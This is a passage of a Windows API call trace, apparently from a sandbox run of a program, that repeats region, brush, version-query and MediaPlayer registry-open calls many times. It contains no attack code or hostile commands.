hrgnSrc2=0x690401d9, iMode=1) returned 1 [0090.730] CombineRgn (hrgnDst=0x104591f, hrgnSrc1=0x670401dc, hrgnSrc2=0x690401d9, iMode=4) returned 2 [0090.730] CreateSolidBrush (color=0xff) returned 0x210591d [0090.730] CreateSolidBrush (color=0xff0000) returned 0x1105920 [0090.730] DeleteObject (ho=0x1105920) returned 1 [0090.730] DeleteObject (ho=0x690401d9) returned 1 [0090.730] DeleteObject (ho=0x670401dc) returned 1 [0090.730] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.730] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.730] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.730] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.730] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.730] BeginPath (hdc=0x0) returned 0 [0090.730] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.730] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.730] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.730] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.730] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.731] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.731] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6a0401d9 [0090.731] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x680401dc [0090.731] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045921 [0090.731] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045922 [0090.731] CombineRgn (hrgnDst=0x1045921, hrgnSrc1=0x6a0401d9, hrgnSrc2=0x680401dc, iMode=1) returned 1 [0090.731] CombineRgn (hrgnDst=0x1045922, hrgnSrc1=0x6a0401d9, hrgnSrc2=0x680401dc, iMode=4) returned 2 [0090.731] CreateSolidBrush (color=0xff) returned 0x2105920 [0090.731] CreateSolidBrush (color=0xff0000) returned 0x1105923 [0090.731] DeleteObject (ho=0x1105923) returned 1 [0090.731] DeleteObject (ho=0x680401dc) returned 1 [0090.731] DeleteObject (ho=0x6a0401d9) returned 1 [0090.731] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.731] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.731] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.731] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.731] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.731] BeginPath (hdc=0x0) returned 0 [0090.731] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.731] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.731] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.731] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.731] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.732] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x690401dc [0090.732] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6b0401d9 [0090.732] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045924 [0090.732] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045925 [0090.732] CombineRgn (hrgnDst=0x1045924, hrgnSrc1=0x690401dc, hrgnSrc2=0x6b0401d9, iMode=1) returned 1 [0090.732] CombineRgn (hrgnDst=0x1045925, hrgnSrc1=0x690401dc, hrgnSrc2=0x6b0401d9, iMode=4) returned 2 [0090.732] CreateSolidBrush (color=0xff) returned 0x2105923 [0090.732] CreateSolidBrush (color=0xff0000) returned 0x1105926 [0090.732] DeleteObject (ho=0x1105926) returned 1 [0090.732] DeleteObject (ho=0x6b0401d9) returned 1 [0090.732] DeleteObject (ho=0x690401dc) returned 1 [0090.732] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.732] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.732] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.732] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.732] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.732] BeginPath (hdc=0x0) returned 0 [0090.732] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.732] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.732] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.732] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.732] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.732] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.732] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.732] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.733] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6c0401d9 [0090.733] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6a0401dc [0090.733] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045927 [0090.733] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045928 [0090.733] CombineRgn (hrgnDst=0x1045927, hrgnSrc1=0x6c0401d9, hrgnSrc2=0x6a0401dc, iMode=1) returned 1 [0090.733] CombineRgn (hrgnDst=0x1045928, hrgnSrc1=0x6c0401d9, hrgnSrc2=0x6a0401dc, iMode=4) returned 2 [0090.733] CreateSolidBrush (color=0xff) returned 0x2105926 [0090.733] CreateSolidBrush (color=0xff0000) returned 0x1105929 [0090.733] DeleteObject (ho=0x1105929) returned 1 [0090.733] DeleteObject (ho=0x6a0401dc) returned 1 [0090.733] DeleteObject (ho=0x6c0401d9) returned 1 [0090.733] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.733] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.733] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.733] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.733] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.733] BeginPath (hdc=0x0) returned 0 [0090.733] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.733] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.733] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.733] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.733] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.733] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.733] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.733] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.733] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6b0401dc [0090.733] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6d0401d9 [0090.733] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104592a [0090.733] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104592b [0090.734] CombineRgn (hrgnDst=0x104592a, hrgnSrc1=0x6b0401dc, hrgnSrc2=0x6d0401d9, iMode=1) returned 1 [0090.734] CombineRgn (hrgnDst=0x104592b, hrgnSrc1=0x6b0401dc, hrgnSrc2=0x6d0401d9, iMode=4) returned 2 [0090.734] CreateSolidBrush (color=0xff) returned 0x2105929 [0090.734] CreateSolidBrush (color=0xff0000) returned 0x110592c [0090.734] DeleteObject (ho=0x110592c) returned 1 [0090.734] DeleteObject (ho=0x6d0401d9) returned 1 [0090.734] DeleteObject (ho=0x6b0401dc) returned 1 [0090.734] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.734] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.734] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.734] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.734] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.734] BeginPath (hdc=0x0) returned 0 [0090.734] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.734] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.734] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.734] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.734] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.734] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.734] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.734] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.734] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6e0401d9 [0090.734] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6c0401dc [0090.734] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104592d [0090.734] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104592e [0090.734] CombineRgn (hrgnDst=0x104592d, hrgnSrc1=0x6e0401d9, hrgnSrc2=0x6c0401dc, iMode=1) returned 1 [0090.734] CombineRgn (hrgnDst=0x104592e, hrgnSrc1=0x6e0401d9, hrgnSrc2=0x6c0401dc, iMode=4) returned 2 [0090.734] CreateSolidBrush (color=0xff) returned 0x210592c [0090.734] CreateSolidBrush (color=0xff0000) returned 0x110592f [0090.734] DeleteObject (ho=0x110592f) returned 1 [0090.734] DeleteObject (ho=0x6c0401dc) returned 1 [0090.735] DeleteObject (ho=0x6e0401d9) returned 1 [0090.735] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.735] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.735] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.735] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.735] BeginPath (hdc=0x0) returned 0 [0090.735] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.735] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.735] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.735] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.735] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.735] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.735] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6d0401dc [0090.735] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6f0401d9 [0090.735] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045930 [0090.735] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045931 [0090.735] CombineRgn (hrgnDst=0x1045930, hrgnSrc1=0x6d0401dc, hrgnSrc2=0x6f0401d9, iMode=1) returned 1 [0090.735] CombineRgn (hrgnDst=0x1045931, hrgnSrc1=0x6d0401dc, hrgnSrc2=0x6f0401d9, iMode=4) returned 2 [0090.735] CreateSolidBrush (color=0xff) returned 0x210592f [0090.735] CreateSolidBrush (color=0xff0000) returned 0x1105932 [0090.735] DeleteObject (ho=0x1105932) returned 1 [0090.735] DeleteObject (ho=0x6f0401d9) returned 1 [0090.735] DeleteObject (ho=0x6d0401dc) returned 1 [0090.735] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.735] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.735] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.735] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.735] BeginPath (hdc=0x0) returned 0 [0090.736] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.736] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.736] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.736] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.736] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.736] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.736] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.736] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.736] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x700401d9 [0090.736] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6e0401dc [0090.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045933 [0090.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045934 [0090.736] CombineRgn (hrgnDst=0x1045933, hrgnSrc1=0x700401d9, hrgnSrc2=0x6e0401dc, iMode=1) returned 1 [0090.736] CombineRgn (hrgnDst=0x1045934, hrgnSrc1=0x700401d9, hrgnSrc2=0x6e0401dc, iMode=4) returned 2 [0090.736] CreateSolidBrush (color=0xff) returned 0x2105932 [0090.736] CreateSolidBrush (color=0xff0000) returned 0x1105935 [0090.736] DeleteObject (ho=0x1105935) returned 1 [0090.736] DeleteObject (ho=0x6e0401dc) returned 1 [0090.736] DeleteObject (ho=0x700401d9) returned 1 [0090.736] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.736] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.736] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.736] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.736] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.736] BeginPath (hdc=0x0) returned 0 [0090.736] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.736] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.736] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.736] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.736] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.736] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.736] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.736] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.737] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6f0401dc [0090.737] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x710401d9 [0090.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045936 [0090.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045937 [0090.737] CombineRgn (hrgnDst=0x1045936, hrgnSrc1=0x6f0401dc, hrgnSrc2=0x710401d9, iMode=1) returned 1 [0090.737] CombineRgn (hrgnDst=0x1045937, hrgnSrc1=0x6f0401dc, hrgnSrc2=0x710401d9, iMode=4) returned 2 [0090.737] CreateSolidBrush (color=0xff) returned 0x2105935 [0090.737] CreateSolidBrush (color=0xff0000) returned 0x1105938 [0090.737] DeleteObject (ho=0x1105938) returned 1 [0090.737] DeleteObject (ho=0x710401d9) returned 1 [0090.737] DeleteObject (ho=0x6f0401dc) returned 1 [0090.737] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.737] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.737] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.737] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.737] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.737] BeginPath (hdc=0x0) returned 0 [0090.737] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.737] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.737] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.737] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.737] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.737] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.737] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.737] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.737] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x720401d9 [0090.737] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x700401dc [0090.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045939 [0090.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104593a [0090.737] CombineRgn (hrgnDst=0x1045939, hrgnSrc1=0x720401d9, hrgnSrc2=0x700401dc, iMode=1) returned 1 [0090.737] CombineRgn (hrgnDst=0x104593a, hrgnSrc1=0x720401d9, hrgnSrc2=0x700401dc, iMode=4) returned 2 [0090.737] CreateSolidBrush (color=0xff) returned 0x2105938 [0090.737] CreateSolidBrush (color=0xff0000) returned 0x110593b [0090.737] DeleteObject (ho=0x110593b) returned 1 [0090.737] DeleteObject (ho=0x700401dc) returned 1 [0090.737] DeleteObject (ho=0x720401d9) returned 1 [0090.737] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.737] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, 